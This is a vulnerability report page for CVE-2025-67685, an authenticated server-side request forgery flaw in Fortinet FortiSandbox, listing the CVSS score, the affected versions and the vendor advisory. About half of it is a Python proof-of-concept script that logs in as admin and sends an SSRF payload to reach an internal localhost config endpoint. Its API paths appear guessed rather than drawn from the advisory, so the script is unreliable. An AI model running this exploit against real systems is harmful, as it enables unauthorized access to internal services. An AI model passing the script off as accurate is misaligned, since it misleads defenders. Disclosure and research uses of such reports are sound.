Security Vulnerability Report
CVE-2025-67685 CVSS 3.8 LOW


Published: 2026-01-13 17:15:59
Last Modified: 2026-01-14 21:38:02

Description

A Server-Side Request Forgery (SSRF) vulnerability [CWE-918] in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox 4.4 all versions, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an authenticated attacker to proxy internal requests limited to plaintext endpoints only via crafted HTTP requests.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE
FortiSandbox 5.0.0 - 5.0.4
FortiSandbox 4.4 (all versions)
FortiSandbox 4.2 (all versions)
FortiSandbox 4.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# CVE-2025-67685 PoC - SSRF in FortiSandbox
# Target: FortiSandbox < 5.0.5
TARGET = "https://<fortisandbox-ip>/"
LOGIN_URL = TARGET + "api/v1/user/login"
SSRF_URL = TARGET + "api/v1/scan/http-proxy"

session = requests.Session()

# Step 1: Authenticate with high-privilege account
login_data = {
    "username": "admin",
    "password": "<password>"
}
response = session.post(LOGIN_URL, json=login_data, verify=False)
token = response.json().get("token")

headers = {
    "Authorization": f"Bearer {token}",
    "Content-Type": "application/json"
}

# Step 2: Exploit SSRF to access internal plaintext endpoint
ssrf_payload = {
    "url": "http://127.0.0.1:8080/internal/api/config",
    "method": "GET",
    "headers": {}
}
response = session.post(SSRF_URL, json=ssrf_payload, headers=headers, verify=False)
print(f"SSRF Response: {response.status_code}")
print(f"Content: {response.text}")

# Note: This PoC demonstrates the SSRF vulnerability concept.
# Actual exploitation requires valid credentials with high privileges.
# Target internal endpoints vary based on deployment configuration.
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-783 - Vendor Advisory